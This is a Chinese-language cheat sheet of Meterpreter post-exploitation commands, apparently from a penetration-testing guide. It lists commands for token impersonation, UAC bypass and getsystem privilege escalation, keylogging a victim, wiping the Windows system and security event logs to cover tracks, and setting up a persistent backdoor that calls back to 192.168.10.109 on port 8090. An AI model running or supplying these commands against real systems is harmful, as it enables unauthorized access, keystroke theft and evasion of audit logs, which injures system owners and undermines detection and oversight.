meterpeter:
- 可以在 Meterpreter 使用 incognito 来开始模拟过程:
use incognito - 展示 incognito 的帮助文档,通过输入 help 命令:
help - 获得可用用户的列表
list_tokens –u - 模拟攻击
impersonate_token \willie-pc\willie
本地提权攻击:
getsystem
如果你尝试获得 Windows 7 主机的访问,你必须在执行 getsystem 命令之前执
行 bypassuac 。 bypassuac 允许你绕过微软的用户账户控制。这个命令这样运
行: run post/windows/escalate/bypassuac 。
收集受害者数据:
keyscan_start
keyscan_dump
也可以使用 Wireshark 或
airodump-ng 来更简单地收集数据。
清理踪迹:
- 运行 IRB,以便进行日志移除操作。我们打开帮助文件:
irb - 下面,我们告诉 IRB 要移除哪个文件。下面是一个可用的选择:
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
log = client.sys.eventlog.open('directory service')
log = client.sys.eventlog.open('dns server')
log = client.sys.eventlog.open('file replication service') - 出于我们的目的,我们把它们都清理掉。你需要将这些一次键入:
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
log = client.sys.eventlog.open('directory service')
log = client.sys.eventlog.open('dns server')
log = client.sys.eventlog.open('file replication service') - 现在我们执行命令来清理日志文件:
Log.clear
创建永久后门:
run persistence –h
现在,我们执行命令来建立后门:
run persistence –U –A –i 10 – 8090 –r 192.168.10.109
后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。